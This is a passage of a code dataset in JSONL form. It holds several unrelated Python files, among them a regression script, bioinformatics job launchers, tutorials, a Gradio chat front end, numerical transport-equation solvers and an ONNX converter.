poly.fit_transform(X_test_df)\r\n\r\nfrom sklearn import linear_model\r\nmodel = linear_model.LinearRegression()\r\nmodel = model.fit(X_train_poly, Y_train)\r\ncoefficient = model.coef_\r\nintercep = model.intercept_\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np \r\nstep = 1/139\r\nx_axis = np.arange(0, 1, step)\r\n\r\n#Creating the polynomial equation\r\nresponse = intercep + coefficient[1] * x_axis + coefficient[2] * x_axis**2 + coefficient[3]*x_axis**3 + coefficient[4]*x_axis**4 + coefficient[5]*x_axis**5 #+ coefficient[6]*x_axis**6\r\n\r\n#Metrics\r\nfrom sklearn.metrics import r2_score\r\nprediction = model.predict(X_test_poly)\r\nr_squared = r2_score(Y_test, prediction) # r2_score expects (y_true, y_pred)\r\nprint('Prediction: ', prediction)\r\nprint('\\n')\r\nprint('R^2: ', r_squared)\r\n\r\nrscld_df = min_max_scaler.inverse_transform(scaled_df)\r\nrscld_df = pd.DataFrame(rscld_df, columns = ['Year', 'No smoothing'])\r\n#print(rscld_df.tail())\r\n\r\nrscld_res = pd.DataFrame(response, columns = ['No smoothing'])\r\nrscld_axis = pd.DataFrame(x_axis, columns = ['Year'])\r\nrscld_prediction = pd.DataFrame(prediction, columns = ['No smoothing'])\r\nrscld_response = pd.DataFrame()\r\nrscld_response['Year'], rscld_response['No smoothing'] = rscld_axis['Year'], rscld_res['No smoothing']\r\n\r\nrscld_response = min_max_scaler.inverse_transform(rscld_response)\r\nrscld_response = pd.DataFrame(rscld_response, columns = ['Year', 'No smoothing'])\r\n\r\n#print(rscld_response.tail())\r\n\r\nplt.scatter(rscld_df['Year'], rscld_df['No smoothing'], color = 'b')\r\nplt.plot(rscld_response['Year'], rscld_response['No smoothing'], color = 'r')\r\nplt.xlabel('Years')\r\nplt.ylabel('Offset °C from ideal temperature')\r\nplt.legend(['Raw data', 'Model'], loc = 'upper left') # labels follow plot order: scatter first, then the fitted curve\r\nplt.show()\r\n\r\nchoice = input('Would you like to make a prediction? 
(Y/N) \\n')\r\nwhile choice == 'Y':\r\n Target = input('Type the year you wish to know the temperature of\\n')\r\n Target = int(Target) + 1\r\n \r\n size = Target - 1880\r\n ro3 = size/139\r\n stepp = 1 / 139\r\n \r\n axis = np.arange(0, ro3, stepp)\r\n axis_fake = np.arange(1880, Target, 1)\r\n \r\n period = len(axis)\r\n array = np.reshape(axis, (period, 1))\r\n array_fake = np.reshape(axis_fake, (len(axis_fake), 1))\r\n\r\n res = intercep + coefficient[1] * axis + coefficient[2] * axis**2 + coefficient[3]*axis**3 + coefficient[4]*axis**4 + coefficient[5]*axis**5 #+ coefficient[6]*axis**6\r\n df_res = pd.DataFrame(res, columns = ['Temperature'])\r\n df_axis = pd.DataFrame(array, columns = ['Year'])\r\n df_fake = pd.DataFrame(array_fake, columns = ['Year'])\r\n \r\n final_df = pd.DataFrame()\r\n final_df['Year'], final_df['Temperature'] = df_axis['Year'], df_res['Temperature']\r\n final_df = min_max_scaler.inverse_transform(final_df)\r\n final_df = pd.DataFrame(final_df, columns = ['Year', 'Temperature'])\r\n final_final = pd.DataFrame()\r\n final_final['Year'], final_final['Offset °C from ideal temp'] = df_fake['Year'], final_df['Temperature']\r\n print(final_final.tail())\r\n \r\n choice = input('Would you like to make another prediction? (Y/N)\\n')\r\n\r\n","repo_name":"DarienRG/gwp","sub_path":"Global_warming_poly2nd.py","file_name":"Global_warming_poly2nd.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5314060643","text":"import os\nimport sys\n\nEXPERIMENT = sys.argv[1] # PRJNA347654\nTHREADS = sys.argv[2]\n\nsamples = os.listdir(\"/g100_scratch/userexternal/dgambitt/ASD/MM/\" + EXPERIMENT)\nsamples = set([s.split('.')[0] for s in samples])\n\nprint(samples)\n\nprint(\"#!/bin/bash\")\n\nfor sample in samples:\n run = \"sbatch --export=ALL,SAMPLE={}/{},THREADS={},OUT={}\".format(\n EXPERIMENT, sample, THREADS, sample)\n run += \" --job-name={}_thalign --output={}.out --error={}.err\".format(\n sample[-3:], sample, sample\n )\n run += \" ~/bio-scripts/TopHat2/launch_tophat2.sh\"\n print(run)\n\n","repo_name":"damgambit/bio-scripts","sub_path":"STAR/generate_STAR_alignment_job.py","file_name":"generate_STAR_alignment_job.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71335175112","text":"# encoding:utf-8\n\n\ndef fibs(num):\n result = [0, 1]\n for i in range(num):\n result.append(result[-2] + result[-1])\n return result\n\nprint(fibs(8))\n\n\n# Keyword arguments and default parameter values ----------------------------------------------------------\ndef say_hello(greeting='Hello', name='World'):\n print('%s, %s' % (greeting, name))\n\n# Output: Hello, James\nsay_hello(name=\"James\")\n\n\n# Collecting arguments -----------------------------------------------------------------------\n# *params: collect the remaining positional arguments into a tuple\n# **params: collect the remaining keyword arguments into a dict\ndef print_names(greeting, *names, **desc):\n for name in names:\n print('%s, %s' % (greeting, name))\n print(desc)\n\n# Output:\n# Hi, James\n# Hi, Mike\n# Hi, Philip\n# {'name': 'Simon', 'age': 24}\nprint_names(\"Hi\", \"James\", \"Mike\", \"Philip\", name=\"Simon\", age=24)\n\ncontent = {'name': 'Simon', 'greeting': 'Hi'}\n# The reverse of argument collection: unpack a dict into keyword arguments, or a sequence into positional arguments ----------------------\nsay_hello(**content)\n\n\n# Scope: an inner scope (e.g. a function) cannot affect global variables -------------------------------------\ndef change_x():\n x = 10\n\n\n# Changing a global variable from a local scope ---------------------------------------------------------\n# 1. globals()['param']: fetch the global variable\n# 2. declare it global with 'global param', then modify param directly\ndef change_global_x():\n global x\n x = 15\n\nx = 5\nchange_x()\n# Output: 5\nprint(x)\nchange_global_x()\n# Output: 15\nprint(x)\n\n\n# nonlocal: the enclosing scope --------------------------------------------------------------\ndef change_local():\n p_a = 10\n p_b = 10\n\n def change_param():\n p_a = 12\n # use the variable from the enclosing scope\n nonlocal p_b\n p_b = 12\n change_param()\n # Output: 10\n print(p_a)\n # Output: 12\n print(p_b)\n\nchange_local()\n\n# lambda expressions: lambda *params : operate(params) ------------------------------------\n# Commonly used Python functions:\n# map(func, seq[, seq, ......]) apply the function to every element of the sequence(s)\n# filter(func, seq) return a list of the elements for which the function is true\n# reduce(func, seq[, initial]) apply the function to the first two elements, then to the result and the next element, until the whole sequence is processed\n# sum(seq) return the sum of all elements of the sequence\n# apply(func[, args[, kwargs]]) call the function, optionally supplying arguments\nnumbers = [1, 3, 4, 8, 10, 15]\nfilter_numbers = filter(lambda num: num % 2 == 0, numbers)\nfor number in filter_numbers:\n print(number)\n","repo_name":"xishang/demos","sub_path":"Python/base-demo/FunctionDemo.py","file_name":"FunctionDemo.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"25336591362","text":"import io\nimport sys\n\n_INPUT = \"\"\"\\\n6\n2 19\n2 3\n5 6\n2 18\n2 3\n5 6\n3 1001\n1 1\n2 1\n100 10\n\"\"\"\n\nsys.stdin = io.StringIO(_INPUT)\ncase_no=int(input())\nfor __ in range(case_no):\n N,X=map(int,input().split())\n dp=[0]*(10**4+1)\n dp[0]=1\n for i in range(N):\n A,B=map(int,input().split())\n for j in reversed(range(10**4+1)):\n if dp[j]==1:\n for k in range(B):\n if j+(k+1)*A<=10**4: dp[j+(k+1)*A]=1\n if dp[X]==1: print('Yes')\n else: print('No')","repo_name":"katonyonko/ABC286","sub_path":"ABC286_D.py","file_name":"ABC286_D.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5048500857","text":"def sumNumbersDaysYear (arrayDays):\n months = 0\n function_result = 0\n while months < 12:\n i = 0\n for i in range(arrayDays[months]):\n function_result += sum(map(int, str(i + 1)))\n months += 1\n return function_result\n \ninfinity = 0\ntrust_operation = False\nwhile infinity != 1:\n daysRegularYear = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n result = 0\n while True:\n try:\n year = int(input('Enter a year: '))\n if year > 0:\n trust_operation = True\n else:\n trust_operation = False\n except:\n print('Error')\n if trust_operation == True:\n break\n if (year % 4 == 0 and year % 100 != 0) or year % 400 == 0: # full Gregorian leap-year rule\n daysRegularYear[1] = 29\n result = sumNumbersDaysYear(daysRegularYear)\n print(f\"In {year} the sum is: {result}\")\n else:\n result = sumNumbersDaysYear(daysRegularYear)\n print(f\"In {year} the sum is: {result}\")\n infinity = int(input('Enter any number to continue or 1 to finish the program: '))","repo_name":"l1r1k/sumNumberYear","sub_path":"sumNumbers.py","file_name":"sumNumbers.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19853131232","text":"#!/usr/bin/env python3\nimport typing\nimport logging\nimport openai\nfrom chat_utils import ask\nimport os\nimport gradio as gr\nimport requests\nfrom typing import Dict, Any, Optional, List\nfrom enum import Enum\nimport json\n\n\nBEARER_TOKEN: str = os.environ.get(\"BEARER_TOKEN\")\nGENAI_DATA_ASK_API_ENDPOINT: str = os.environ.get(\"GENAI_DATA_ASK_API_ENDPOINT\")\nassert BEARER_TOKEN != None\nassert GENAI_DATA_ASK_API_ENDPOINT != None\n\nfrom fastapi import FastAPI\nfrom pydantic 
import BaseModel\nimport gradio as gr\nfrom a2wsgi import ASGIMiddleware\n\n# from predict import predict\nfast_app = FastAPI()\n\nclass Source(str, Enum): \n email = \"email\" \n file = \"file\" \n chat = \"chat\" \n sql = \"sql\" \n\nclass Metadata(BaseModel): \n source: Optional[Source] = None \n source_id: Optional[str] = None \n url: Optional[str] = None \n created_at: Optional[str] = None \n author: Optional[str] = None \n database: Optional[str] = None \n tables: Optional[str] = None \n sql: Optional[str] = None \n \nclass ChunkWithMetadata(BaseModel): \n text: str \n metadata: Metadata \n \n def format_with_metadata(self) -> str: \n if self.metadata.tables: \n return f\"{self.metadata.tables}:{self.text}\" \n return f\"{self.metadata.source_id}:{self.text}\" \n\n\nclass Answer(BaseModel): \n content: str\n metadata: List[ChunkWithMetadata]\n \ndef dispatch_payload(payload: Dict[str, Any]) -> Answer:\n headers: Dict[str, str] = {\n \"Authorization\": f\"Bearer {BEARER_TOKEN}\"\n }\n #url: str = f\"{GENAI_DATA_ASK_API_ENDPOINT}/ask\"\n url: str = f\"{GENAI_DATA_ASK_API_ENDPOINT}/ask?structured=true\"\n response: requests.Response = requests.post(url=url, headers=headers, json=payload)\n status_code = response.status_code\n content = response.json()\n print(f\"status_code: {status_code}\")\n print(f\"content:\")\n print(json.dumps(content, indent=4))\n ask = content.get('answer')\n return Answer(**ask)\n\ndef create_payload(question: str) -> Dict[str, Any]:\n\n payload: Dict[str, Any] = {\n \"ask\": {\n \"question\": question\n }\n }\n return payload\n\ndef ask(question: str):\n payload = create_payload(question)\n response: Answer = dispatch_payload(payload)\n metadata: List[ChunkWithMetadata] = response.metadata\n # output = ''\n # for m in metadata:\n # output = output + str(m) + \"\\n\"\n # #m.metadata.\n print(response.content)\n #print(output)\n return response.content\n\ndef split_response(input_text: str, history: List):\n history = history or []\n response = chatbot(input_text)\n # print(response)\n # if \"(Sources:\" in response:\n # answer_response, sources = response.split(\"(Sources:\", 1)\n # print(answer_response)\n # sources = \"(Sources: \" + sources\n # print(sources)\n # elif \"(source:\" in response:\n # answer_response, sources = response.split(\"(source:\", 1)\n # print(answer_response)\n # sources = \"(source: \" + sources\n # print(sources)\n # else: \n # answer_response, sources = response, \"\"\n \n # full_response = f\"{input_text}\\n\\n{answer_response}\\n\\n\"\n \n #history.append((input_text, answer_response))\n \n print(response)\n \n #return history, history\n #return answer_response\n return response\n\ndef chatbot(conversation):\n new_message = ask(conversation)\n #return \"User: \" + conversation + \"\\n\\nSystem: \" + new_message + \"\\n\\n\"\n return new_message\n\n# --- fastapi /predict route ---\n\n\nclass Request(BaseModel):\n question: str\n\n\nclass Result(BaseModel):\n score: float\n title: str\n text: str\n\n\nclass Response(BaseModel):\n results: typing.List[Result]\n\n\n\nclass Source(str, Enum):\n email = \"email\"\n file = \"file\"\n chat = \"chat\"\n sql = \"sql\"\n\nclass Ask(BaseModel):\n question: str\n\n\n\n@fast_app.post(\"/predict\", response_model=Response)\nasync def predict_api(request: Request):\n results = ask(request.question)\n return Response(\n results=[\n Result(score=r[\"score\"], title=r[\"title\"], text=r[\"text\"]) for r in results\n ]\n )\n\n\n# --- gradio demo ---\n\n\ndef gradio_predict(question: str):\n results = 
ask(question)\n\n best_result = results[0]\n\n return f\"{best_result['title']}\\n\\n{best_result['text']}\", best_result[\"score\"]\n\n\ndemo = gr.Interface(\n fn=chatbot,\n inputs=gr.Textbox(\n label=\"Ask a question about the data\", placeholder=\"What is BASEL III?\"\n ),\n outputs=[gr.Textbox(label=\"Answer\")], #, gr.Number(label=\"Score\")],\n allow_flagging=\"never\",\n)\n\n\ngr_app = gr.mount_gradio_app(fast_app, demo, path=\"/\")\napp = ASGIMiddleware(gr_app)\n\n\n\n","repo_name":"Griffin-Lane/chat_ui","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"44396486622","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n \n def append_to_tail(self, data):\n end_node = Node(data)\n node = self\n while(node.next != None):\n node = node.next\n node.next = end_node \n\n\nclass linkedlist:\n def __init__(self, data):\n self.head = Node(data)\n\n def delete_node(self, data):\n node = self.head\n\n if (node.data == data):\n self.head = self.head.next\n return\n\n while(node.next != None):\n if node.next.data == data:\n node.next = node.next.next\n return\n node = node.next\n \n return\n \n def print_all(self):\n node = self.head\n while(node.next is not None):\n print(node.data)\n node = node.next\n print(node.data) # Last node\n \n \n\n\nif __name__ == \"__main__\":\n test = linkedlist(10)\n print(test.head.data)\n test.head.append_to_tail(20)\n print(test.head.next.data)\n test.delete_node(20)\n print(test.head.data)","repo_name":"MubashirullahD/cracking-the-coding-interview","sub_path":"chapter2/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"26895349389","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport random\nfrom matplotlib.animation import FuncAnimation\n\nN = 100\nn = 50\nh = 0.1\nL = N * h\ntau = 0.1\nT = n * tau\na = 0.8\nu1 = 10\nu2 = 0\nsigma = a * tau / h\n\nq = 0.25\nepsilon = 1e-10\n\n\ndef true_func(x, t):\n return u1 if x < a * t else u2\n\n\ndef explicit_left_corner(_, __, um, um_1, ___):\n return um - sigma * (um - um_1)\n\n\ndef implicit_left_corner(um_1, _, um, __, ___):\n return (um + sigma * um_1) / (1 + sigma)\n\n\ndef reversed_implicit_left_corner(unext, uprev):\n sigma = -1.2 * tau / h\n return (1 + sigma) * unext / sigma - uprev / sigma\n\n\ndef laks(_, ump1, __, um_1, ___):\n return 0.5 * (ump1 + um_1) - 0.5 * sigma * (ump1 - um_1)\n\n\ndef laks_vendrof(_, ump1, um, um_1, __):\n return um - sigma * (um - um_1) - 0.5 * sigma * (1 - sigma) * (ump1 + um_1 - 2 * um)\n\n\ndef smooth_laks_vendrof(ump2, ump1, um, um_1, um_2):\n Dmm = um_1 - um_2\n Dm = um - um_1\n Dp = ump1 - um\n Dpp = ump2 - ump1\n Qp = Dp if Dpp * Dp < 0 or Dp * Dm < 0 else 0\n Qm = Dm if Dmm * Dm < 0 or Dp * Dm < 0 else 0\n return um + q * (Qp - Qm)\n\n\ndef beam_uorming(_, __, um, um_1, um_2):\n return um - sigma * (1.5 * um - 2 * um_1 + 0.5 * um_2) + 0.5 * sigma ** 2 * (um - 2 * um_1 + um_2)\n\n\ndef TVD(_, ump1, um, um_1, um_2):\n rm = (um - um_1 + epsilon) / (ump1 - um + epsilon)\n rm_1 = (um_1 - um_2 + epsilon) / (um - um_1 + epsilon)\n phi = min(2, rm) if rm > 1 else min(2 * rm, 1) if rm > 0 else 0\n phi_1 = min(2, rm_1) if rm_1 > 1 else min(2 * rm_1, 1) if rm_1 > 0 else 0\n return um - sigma * (um - um_1) - 0.5 * sigma * (1 - sigma) * (phi * (ump1 - um) - 
phi_1 * (um - um_1))\n\n\nclass UpdatePlot:\n def __init__(self, ax, title='', right_func=None, main_func=None, left_func=None, smooth_lv=False,\n reversed_left_implicit=False):\n self.right_func = right_func\n self.main_func = main_func\n self.left_func = left_func\n self.smooth_lv = smooth_lv\n self.reversed_left_implicit = reversed_left_implicit\n\n self.notes = np.arange(0, L, h)\n self.spec_notes = np.arange(0, L, h / 3)\n self.true_u = np.ones(3 * N) * u2\n if not self.reversed_left_implicit:\n self.true_u[0] = u1\n else:\n self.true_u[-1] = u1\n\n self.line, = ax.plot([], [], c='black')\n color = random.choice(['blue', 'green', 'purple', 'olive', 'darkorchid', 'deepskyblue', 'darkgoldenrod'])\n self.scat = ax.scatter([], [], c=color)\n self.ax = ax\n\n self.ax.set_ylim(u2 - 2, u1 + 2)\n self.ax.set_xlim(0, L + h)\n self.ax.set_title(title)\n self.ax.grid(True)\n\n self.prev_u = np.ones(N) * u2\n if not self.reversed_left_implicit:\n self.prev_u[0] = u1\n else:\n self.prev_u[-1] = u1\n self.next_u = np.ones(N) * u1\n if self.smooth_lv:\n self.smooth_u = self.prev_u\n\n def __call__(self, i):\n # This way the plot can continuously run and we just keep\n # watching new realizations of the process\n if i == 0:\n self.line.set_data(self.spec_notes, self.true_u)\n if not self.smooth_lv:\n self.scat.set_offsets(np.stack([self.notes, self.prev_u]).T)\n else:\n self.scat.set_offsets(np.stack([self.notes, self.smooth_u]).T)\n return self.line, self.scat\n\n if not self.reversed_left_implicit:\n self.true_u = np.array(list(map(lambda x: true_func(x, (i + 1) * tau), self.spec_notes)))\n if self.right_func is not None:\n self.next_u[1] = self.right_func(self.next_u[0], self.prev_u[2], self.prev_u[1], self.prev_u[0], None)\n else:\n self.next_u[1] = self.main_func(self.next_u[0], self.prev_u[2], self.prev_u[1], self.prev_u[0], None)\n\n for j in range(2, N - 1):\n self.next_u[j] = self.main_func(self.next_u[j - 1], self.prev_u[j + 1], self.prev_u[j],\n self.prev_u[j - 1],\n self.prev_u[j - 2])\n\n if self.left_func is not None:\n self.next_u[-1] = self.left_func(self.next_u[-2], None, self.prev_u[-1], self.prev_u[-2],\n self.prev_u[-3])\n else:\n self.next_u[-1] = self.main_func(self.next_u[-2], None, self.prev_u[-1], self.prev_u[-2],\n self.prev_u[-3])\n\n if self.smooth_lv:\n self.smooth_u = self.next_u.copy()\n for j in range(2, N - 2):\n self.smooth_u[j] = smooth_laks_vendrof(self.next_u[j + 2], self.next_u[j + 1], self.next_u[j],\n self.next_u[j - 1], self.next_u[j - 2])\n\n\n else:\n self.true_u = np.array(list(map(lambda x: u2 if x < L - 1.2 * (i + 1) * tau else u1, self.spec_notes)))\n\n for j in range(N - 2, -1, -1):\n self.next_u[j] = reversed_implicit_left_corner(self.next_u[j + 1], self.prev_u[j + 1])\n\n self.prev_u = self.next_u\n self.next_u = np.ones(N) * u1\n\n self.line.set_data(self.spec_notes, self.true_u)\n if not self.smooth_lv:\n self.scat.set_offsets(np.stack([self.notes, self.prev_u]).T)\n else:\n self.scat.set_offsets(np.stack([self.notes, self.smooth_u]).T)\n\n return self.line, self.scat\n\n\ndef main():\n fig, ax = plt.subplots(figsize=(12, 6))\n ud = UpdatePlot(ax, title='Explicit left corner', main_func=explicit_left_corner)\n # ud = UpdatePlot(ax, title='Implicit left corner', main_func=implicit_left_corner)\n # ud = UpdatePlot(ax, title='Implicit left corner', reversed_left_implicit=True)\n # ud = UpdatePlot(ax, title='Laks', main_func=laks, left_func=explicit_left_corner)\n # ud = UpdatePlot(ax, title='Laks Vendrof', main_func=laks_vendrof, 
left_func=explicit_left_corner, smooth_lv=True)\n # ud = UpdatePlot(ax, title='Beam Uorming', main_func=beam_uorming, right_func=explicit_left_corner)\n # ud = UpdatePlot(ax, title='TVD', main_func=TVD, left_func=explicit_left_corner, right_func=explicit_left_corner)\n anim = FuncAnimation(fig, ud, frames=55, interval=200, blit=True, repeat=False)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amansyayf/computational-mathematics","sub_path":"transport equation.py","file_name":"transport equation.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38628879141","text":"import onnx\nimport torch\nfrom onnx2torch import convert\n\n\ndef onnx_to_torch(onnx_model_path):\n \"\"\"Converts an ONNX model to a PyTorch model.\n\n Args:\n onnx_model_path: The path to the ONNX model.\n\n Returns:\n A PyTorch model.\n \"\"\"\n x = torch.randn(1, 1024)\n\n frame_num = torch.tensor([2])\n hidden = 48\n depth = 4\n if depth == 4:\n conv_state_sizes = [\n (1, hidden, 148),\n (1, hidden * 2, 36),\n (1, hidden * 4, 8),\n (1, hidden * 4, 4),\n (1, hidden * 2, 4),\n (1, hidden, 4),\n (1, 1, 4)\n ]\n else:\n conv_state_sizes = [\n (1, hidden, 596),\n (1, hidden * 2, 148),\n (1, hidden * 4, 36),\n (1, hidden * 8, 8),\n (1, hidden * 8, 4),\n (1, hidden * 4, 4),\n (1, hidden * 2, 4),\n (1, hidden, 4),\n (1, 1, 4)\n ]\n resample_buffer = 64\n conv_state_list = [torch.randn(size) for size in conv_state_sizes]\n conv_state = torch.cat([t.view(1, -1) for t in conv_state_list], dim=1)\n lstm_state_1 = torch.randn(2, 1, hidden * 2 ** (depth - 1))\n lstm_state_2 = torch.randn(2, 1, hidden * 2 ** (depth - 1))\n resample_input_frame = torch.randn(1, resample_buffer)\n resample_out_frame = torch.randn(1, resample_buffer)\n\n onnx_model = onnx.load(onnx_model_path)\n torch_model = torch.jit.trace(onnx_model, example_inputs=(x, frame_num, resample_input_frame, resample_out_frame,\n conv_state, lstm_state_1, lstm_state_2))\n return torch_model\n\n\nif __name__ == \"__main__\":\n onnx_model_path = \"D:/zeynep/data/noise-cancelling/denoiser/dns/hidden=48-depth=4/dns48_depth=4_stream.onnx\"\n #torch_model = onnx_to_torch(onnx_model_path)\n\n\n # Path to ONNX model\n # You can pass the path to the onnx model to convert it or...\n torch_model_1 = convert(onnx_model_path)\n print(torch_model_1)\n # Or you can load a regular onnx model and pass it to the converter\n onnx_model = onnx.load(onnx_model_path)\n torch_model_2 = convert(onnx_model)\n print(torch_model_2)\n","repo_name":"zeynepgulhanuslu/denoiser-onnx","sub_path":"onnx_to_torch.py","file_name":"onnx_to_torch.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"81832979","text":"## @package policy_network_model\n# @brief A model of a neural network policy that assesses the current state in the\n# form of a prediction of the expected outcome of a round (win / draw / loss)\n\nfrom keras.layers.core import Dense, Dropout\nfrom keras.models import Sequential, load_model, Model\nfrom keras.callbacks import ModelCheckpoint\nfrom source.networks.policy_network.policy_network_settings import POLICY_HIDDEN_LAYERS_QUANTITY, \\\n POLICY_NEURONS_QUANTITY\nfrom source.networks.policy_network.policy_network_settings import POLICY_BATCH_SIZE, POLICY_DATASET_SIZE, POLICY_EPOCHS\nfrom source.poker_items import Deck, Hand, Card\n\nimport random\nimport 
matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n## Policy network model class\nclass PolicyNetwork:\n def __init__(self): # Later - more parameters\n self.history = None\n\n self.checkpoint_path = \"networks/policy_network/trainings/training_2/cp.ckpt\"\n self.checkpoint_abs_path = os.path.abspath(self.checkpoint_path)\n\n self.layers_quant = POLICY_HIDDEN_LAYERS_QUANTITY\n self.neurons_quant = POLICY_NEURONS_QUANTITY\n\n self.model = Sequential()\n\n # Input layer\n self.model.add(Dense(14, input_dim=14))\n\n # Hidden layers\n for i in range(POLICY_HIDDEN_LAYERS_QUANTITY):\n self.model.add(Dense(POLICY_NEURONS_QUANTITY, activation='relu'))\n self.model.add(Dropout(0.2))\n\n # Output layer\n self.model.add(Dense(1, activation='relu')) # from -12 to 9\n\n # Compile model\n self.model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])\n\n ## Function that creates full dataset with fixed size\n # @input The size of needed dataset\n # @return Game situation (array of cards) and true value won/draw/lost\n def create_full_dataset(self, size=POLICY_DATASET_SIZE):\n\n training_set = []\n true_results_set = []\n\n for _ in range(size):\n train, result = self.create_train()\n training_set.append(train)\n true_results_set.append(result)\n\n numpy_training_set = np.array(training_set)\n numpy_true_results_set = np.array(true_results_set)\n\n return numpy_training_set, numpy_true_results_set\n\n ## Function that creates one random game position\n # @return Game situation (array of cards) and true value won/draw/lost\n def create_train(self):\n train = []\n open_cards_quantity = random.randint(2, 5)\n deck = Deck()\n deck.shuffle()\n\n hand1 = Hand()\n hand2 = Hand()\n board = Hand()\n\n for i in range(2):\n hand1.add_card(deck.get_card())\n for i in range(2):\n hand2.add_card(deck.get_card())\n for i in range(5):\n board.add_card(deck.get_card())\n\n round_result = 0\n if hand1.better_than(hand2, board):\n round_result = 2 # Player wins\n elif hand1.worse_than(hand2, board):\n round_result = 0 # Opponent wins\n elif hand1.equal_to(hand2, board):\n round_result = 1 # Draw\n\n values = []\n suits = []\n\n # In hand 1\n for card in hand1.cards:\n values.append(card.value)\n\n # suits = [\"♠\", \"♣\", \"♥\", \"♦\"] # \"spades\", \" clubs\", \"hearts\", \"diamonds\"\n if card.suit == '0':\n suits.append(0)\n elif card.suit == \"♠\":\n suits.append(1)\n elif card.suit == \"♣\":\n suits.append(2)\n elif card.suit == \"♥\":\n suits.append(3)\n elif card.suit == \"♦\":\n suits.append(4)\n\n # In board\n for i in range(open_cards_quantity):\n values.append(board.cards[i].value)\n\n # suits = [\"♠\", \"♣\", \"♥\", \"♦\"] # \"spades\", \" clubs\", \"hearts\", \"diamonds\"\n\n if board.cards[i].suit == \"♠\":\n suits.append(1)\n elif board.cards[i].suit == \"♣\":\n suits.append(2)\n elif board.cards[i].suit == \"♥\":\n suits.append(3)\n elif board.cards[i].suit == \"♦\":\n suits.append(4)\n for i in range(5 - open_cards_quantity):\n values.append(0)\n suits.append(0)\n\n numpy_train = np.array(values + suits) # Convert our array to numpy array\n # numpy_train = np.array(values)\n # print(numpy_train.shape)\n return numpy_train, round_result\n\n ## Function that starts network training\n def start_training(self):\n checkpoint_callback = ModelCheckpoint(filepath=self.checkpoint_path, save_weights_only=True, verbose=1)\n training_set, true_results_set = self.create_full_dataset()\n # true_results_set = true_results_set.reshape(10000, 1, 1)\n self.history = 
self.model.fit(training_set, true_results_set, epochs=POLICY_EPOCHS,\n batch_size=POLICY_BATCH_SIZE,\n callbacks=[checkpoint_callback])\n\n ## A function that visualizes the results of the last training session in the form of graphs of changes in\n # accuracy and losses over time\n def visualize_studying_results(self):\n # print(self.history.history.keys())\n # summarize history for accuracy\n plt.plot(self.history.history['accuracy'])\n # plt.plot(self.history.history['val_accuracy'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n # self.history.history[]\n # summarize history for loss\n plt.plot(self.history.history['loss'])\n # plt.plot(self.history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n ## A function that evaluates the policy for the transferred game state\n # @param hand: Cards in players hand\n # @param board: Cards on board (the unknown are coded as 00)\n # @return The policy value of the current state\n def predict(self, hand, board):\n values = []\n suits = []\n\n for card in hand.cards:\n values.append(card.value)\n\n # suits = [\"♠\", \"♣\", \"♥\", \"♦\"] # \"spades\", \" clubs\", \"hearts\", \"diamonds\"\n if card.suit == '0':\n suits.append(0)\n elif card.suit == \"♠\":\n suits.append(1)\n elif card.suit == \"♣\":\n suits.append(2)\n elif card.suit == \"♥\":\n suits.append(3)\n elif card.suit == \"♦\":\n suits.append(4)\n\n for card in board.cards:\n values.append(card.value)\n\n # suits = [\"♠\", \"♣\", \"♥\", \"♦\"] # \"spades\", \" clubs\", \"hearts\", \"diamonds\"\n if card.suit == '0':\n suits.append(0)\n elif card.suit == \"♠\":\n suits.append(1)\n elif card.suit == \"♣\":\n suits.append(2)\n elif card.suit == \"♥\":\n suits.append(3)\n elif card.suit == \"♦\":\n suits.append(4)\n\n input = np.array([values + suits])\n\n return self.model.predict(input)\n\n ## A function that evaluates the current version of network\n # @return Average accuracy and loss for a random test data set\n def evaluate(self):\n x_test, y_test = self.create_full_dataset(10000)\n value = self.model.evaluate(x_test, y_test, 1000)\n return value\n\n ## Function loading the weights of the latest trained version of the neural network\n # @param path: The path to the weight data directory\n def load(self, path=None):\n if path == None:\n path = self.checkpoint_path\n self.model.load_weights(path)\n","repo_name":"AKnuazev/poker_artificial_intelligence","sub_path":"source/networks/policy_network/policy_network_model.py","file_name":"policy_network_model.py","file_ext":"py","file_size_in_byte":7924,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"39045092162","text":"import numpy as np\nimport pandas as pd\nimport time\n\n\ndef ffa_algorithm(table, costs, pop_size=30, max_iter=150, gamma=1.0, betta_0=1.0, notation=\"CS\", transfer_fun=\"stan\",\n distance=\"euclid\", betta_pow=2, alpha=0.5, alpha_inf=None, alpha_0=None,\n gamma_alter=0, move_type=None):\n discrete = standard_discrete\n 